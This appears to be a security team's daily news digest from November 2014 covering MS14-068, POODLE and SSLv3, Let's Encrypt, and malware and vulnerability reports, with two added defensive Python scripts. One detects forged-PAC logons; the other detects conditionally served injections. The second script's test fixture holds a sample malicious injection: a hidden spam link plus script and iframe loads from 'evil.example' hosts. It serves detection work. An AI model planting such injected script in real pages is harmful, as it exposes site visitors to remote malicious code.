Daily summary - Wednesday 19-11-2014

End-of-Shift report

Timeframe: Tuesday 18-11-2014 18:00 − Wednesday 19-11-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a

MS14-068 - Critical: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Version: 1.0

This security update resolves a privately reported vulnerability in Microsoft Windows Kerberos KDC that could allow an attacker to elevate unprivileged domain user account privileges to those of the domain administrator account. An attacker could use these elevated privileges to compromise any computer in the domain, including domain controllers. An attacker must have valid domain credentials to...

https://technet.microsoft.com/en-us/library/security/MS14-068


Additional information about CVE-2014-6324

Today Microsoft released update MS14-068 to address CVE-2014-6324, a Windows Kerberos implementation elevation of privilege vulnerability that is being exploited in-the-wild in limited, targeted attacks. The goal of this blog post is to provide additional information about the vulnerability, update priority, and detection guidance for defenders. Microsoft recommends customers apply this update to their domain controllers as quickly as possible.

Vulnerability Details

CVE-2014-6324 allows...

http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
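The SRD post's detection guidance for CVE-2014-6324 boils down to one check on Security log event 4624: in the "New Logon" section, the Security ID (which comes from the forged PAC) resolves to a different account than the Account Name. The script below is an added example of that check, not code from Microsoft or the SRD post. The event bodies, SIDs and the SID-to-account map are constructed; on a real domain the SIDs would be resolved against the directory and the events pulled from the DCs and member servers.

```python
"""Flag 4624 logon events whose New Logon Security ID does not match the
Account Name: the indicator the SRD post gives for MS14-068 exploitation.
All event text, SIDs and the directory map below are constructed samples."""
import re

# Constructed SID -> account map (stand-in for an LDAP/ADSI lookup).
DIRECTORY = {
    "S-1-5-21-1004336348-1177238915-682003330-500": "Administrator",
    "S-1-5-21-1004336348-1177238915-682003330-1107": "jdoe",
    "S-1-5-21-1004336348-1177238915-682003330-1108": "mbrown",
}

# Pull the Security ID and Account Name from the "New Logon" section only;
# the "Subject" section earlier in the message has the same field names.
NEW_LOGON = re.compile(
    r"New Logon:.*?Security ID:\s*(?P<sid>S-1-[\d-]+).*?Account Name:\s*(?P<name>\S+)",
    re.S,
)


def parse_new_logon(message):
    """Return (sid, account_name) from a 4624 message body, or None."""
    m = NEW_LOGON.search(message)
    return (m.group("sid"), m.group("name")) if m else None


def is_forged_pac_logon(message, directory=DIRECTORY):
    """True when the SID resolves to a different account than the name shown."""
    parsed = parse_new_logon(message)
    if parsed is None:
        return False
    sid, name = parsed
    resolved = directory.get(sid)
    # An unresolvable SID is not flagged here; investigate those separately.
    return resolved is not None and resolved.lower() != name.lower()


def scan(events, directory=DIRECTORY):
    """events: iterable of {'EventID': int, 'Computer': str, 'Message': str}."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624:
            continue
        if is_forged_pac_logon(ev["Message"], directory):
            sid, name = parse_new_logon(ev["Message"])
            hits.append({"computer": ev["Computer"], "sid": sid,
                         "name": name, "resolved": directory[sid]})
    return hits


def _msg(sid, name):
    """Build a constructed 4624 message body in the Event Viewer layout."""
    return ("An account was successfully logged on.\n\nSubject:\n"
            "\tSecurity ID:\t\tNULL SID\n\tAccount Name:\t\t-\n"
            "\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\n"
            "Logon Type:\t\t\t3\n\nNew Logon:\n"
            f"\tSecurity ID:\t\t{sid}\n\tAccount Name:\t\t{name}\n"
            "\tAccount Domain:\t\tCORP\n\tLogon ID:\t\t0x3e7f1a\n")


# Constructed sample: one normal logon, one logon carrying a forged PAC.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "DC01.corp.example",
     "Message": _msg("S-1-5-21-1004336348-1177238915-682003330-1108", "mbrown")},
    {"EventID": 4624, "Computer": "DC01.corp.example",
     "Message": _msg("S-1-5-21-1004336348-1177238915-682003330-500", "jdoe")},
    {"EventID": 4672, "Computer": "DC01.corp.example", "Message": "Special privileges assigned"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['computer']}: account {hit['name']} logged on with SID of "
              f"{hit['resolved']} ({hit['sid']})")
```

The check only fires once the attacker has used the forged ticket to log on somewhere, so run it across every machine that forwards its Security log, not just the domain controllers.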


Google Removes SSLv3 Fallback Support From Chrome

Google has released Chrome 39, fixing 42 security vulnerabilities and removing support for the fallback to SSLv3, the component that was the target of the POODLE attack revealed last month. When the POODLE attack was disclosed by several Google researchers in October, the company said that it had added a change to Chrome that would...

http://threatpost.com/google-removes-sslv3-fallback-support-from-chrome/109455


A New Free CA

Announcing Let's Encrypt, a new free certificate authority. This is a joint project of EFF, Mozilla, Cisco, Akamai, and the University of Michigan. This is an absolutely fantastic idea. The anchor for any TLS-protected communication is a public-key certificate which demonstrates that the server you're actually talking to is the server you intended to talk to. For many server operators,...

https://www.schneier.com/blog/archives/2014/11/a_new_free_ca.html


Survey: real-time SIEM solutions help orgs detect attacks within minutes

Real-time security information and event management solutions help organizations detect targeted attacks and advanced persistent threats within minutes, according to a McAfee survey.

http://www.scmagazine.com/survey-real-time-siem-solutions-help-orgs-detect-attacks-within-minutes/article/384030/


POWELIKS Levels Up With New Autostart Mechanism

Last August, we wrote about POWELIKS's malware routines, which are known for hiding its malicious code in a registry entry as part of its evasion tactics. In the newer samples we spotted, malware detected as TROJ_POWELIKS.B employed a new autostart mechanism and removes users' permission to view the registry key's content. As a result, users won't be able to suspect that...

http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/zurdvNxST00/


Pan-European Cyber Security Competition organised by ENISA

Today (19 November 2014) the European Union Agency for Network and Information Security (ENISA) is happy to announce the planning of the 1st pan-European Cyber Security Competition in 2015. The competition is organised jointly in collaboration with experienced organisations from EU Member States for students.

http://www.enisa.europa.eu/media/news-items/pan-european-cyber-security-competition-organised-by-enisa


RSS Reveals Malware Injections

There are multiple different ways to detect invisible malware on a website: You can scrutinize the HTML code of web pages. Use external scanners like SiteCheck or UnmaskParasites. Get alerts from anti-viruses or search engines (both in search results and via their Webmaster Tools). Try to open web pages with different User-Agents and check for...

http://blog.sucuri.net/2014/11/rss-reveals-malware-injections.html
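One of the checks listed above, fetching a page with different User-Agents and looking for differences, is easy to automate: conditional injections that only target a crawler or only ordinary browsers show up as references present in one variant and absent from the others. The script below is an added example, not Sucuri's code or the post's own tooling. The three HTML variants, the hostnames and the "blog.example" site host are constructed; in practice each variant is fetched with the corresponding User-Agent header.

```python
"""Diff the external references (script/iframe/link/anchor targets and
inline script bodies) across copies of one page served to different
User-Agents, then single out the ones pointing off-site.
The page variants below are constructed for this example."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class RefCollector(HTMLParser):
    """Collect (tag, target) pairs and inline script bodies from HTML."""
    WATCH = {"script": "src", "iframe": "src", "link": "href", "a": "href"}

    def __init__(self):
        super().__init__()
        self.refs = set()
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        want = self.WATCH.get(tag)
        if want and a.get(want):
            self.refs.add((tag, a[want]))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        body = data.strip()
        if self._in_script and body:
            self.refs.add(("inline-script", body))


def extract_refs(html):
    p = RefCollector()
    p.feed(html)
    p.close()
    return p.refs


def variant_diff(pages):
    """pages: {label: html}. Return {label: refs not common to every variant}."""
    refs = {label: extract_refs(html) for label, html in pages.items()}
    common = set.intersection(*refs.values()) if refs else set()
    return {label: sorted(r - common) for label, r in refs.items()}


def offsite(refs, site_host):
    """Keep only (tag, url) refs whose host differs from the site's own."""
    out = []
    for tag, target in refs:
        host = urlsplit(target).hostname
        if host and host != site_host:
            out.append((tag, target))
    return out


# Constructed page variants: the injection is served only to a crawler UA.
CLEAN = """<html><head><link rel="stylesheet" href="/style.css">
<script src="/js/app.js"></script></head>
<body><h1>Blog</h1><a href="/about">About</a></body></html>"""

INJECTED = CLEAN.replace(
    "</body>",
    '<div style="position:absolute;left:-9999px"><a href="http://pills.example/buy">cheap</a></div>'
    '<script src="http://cdn.evil.example/x.js"></script>'
    "<script>document.write('<iframe src=\"http://evil.example/ld\"></iframe>')</script></body>",
)

SAMPLE_PAGES = {"browser": CLEAN, "googlebot": INJECTED, "curl": CLEAN}

if __name__ == "__main__":
    for label, extra in variant_diff(SAMPLE_PAGES).items():
        print(label, extra)
        print("  off-site:", offsite(extra, "blog.example"))
```

Fetch each variant from the same network location within a few seconds of each other, otherwise ordinary A/B content or cache differences will show up as false positives.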


Test Tool for Web App Security Scanners Released by Google

A new tool was open-sourced by Google on Tuesday, aiming at improving the efficiency of automated web security scanners by evaluating them with patterns of vulnerabilities already seen in the wild.

http://news.softpedia.com/news/Test-Tool-for-Web-App-Security-Scanners-Released-by-Google-465322.shtml


Microsoft revises the SChannel patch

Quietly, alongside Tuesday's out-of-band update, the Windows makers also shipped a new revision of the SChannel patch. It is meant to fix the problems with TLS encryption and the massive performance hit on SQL Server.

http://www.heise.de/security/meldung/Microsoft-bessert-beim-SChannel-Patch-nach-2460212.html


Most advanced mobile botnet EVER is coming for your OFFICE Androids

A newly discovered variant of NotCompatible is establishing what has been called the most advanced mobile botnet yet created.

http://go.theregister.com/feed/www.theregister.co.uk/2014/11/19/android_botnet_notcompatible/


jQuery: cross-site scripting in captcha example code is widespread

A popular jQuery plugin ships code with a cross-site scripting vulnerability. The vulnerable code originally comes from an example captcha script that is found on a very large number of websites.

http://www.golem.de/news/jquery-cross-site-scripting-in-captcha-beispielcode-weit-verbreitet-1411-110660-rss.html


A Peek Inside a PoS Scammer's Toolbox

PoS malware has been receiving a tremendous amount of attention in the past two years with high-profile incidents like Target, Home Depot, and Kmart. With the massive "Black Friday" shopping season coming up, PoS malware will surely get additional publicity. Because of this high profile, we constantly look for evolving PoS malware and look into their behavior...

http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/xF7gxViXP4A/


Nasty Security Bug Fixed in Android Lollipop 5.0

There is a vulnerability in Android versions below 5.0 that could allow an attacker to bypass ASLR and run arbitrary code on a target device under certain circumstances. The bug was fixed in Lollipop, the newest version of the mobile OS, released earlier this week. The vulnerability lies in java.io.ObjectInputStream, which fails to check whether...

http://threatpost.com/nasty-security-bug-fixed-in-android-lollipop-5-0/109476


Cisco Unified Communications Manager IM and Presence Service Enumeration Vulnerability

CVE-2014-8000

http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014-8000


Multiple Samsung Galaxy devices Knox code execution

http://xforce.iss.net/xforce/xfdb/98780


Google Chrome pdfium code execution

http://xforce.iss.net/xforce/xfdb/98790


Bugtraq: [SECURITY] [DSA 3074-2] php5 regression update

http://www.securityfocus.com/archive/1/534018


Bugtraq: Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension

http://www.securityfocus.com/archive/1/534017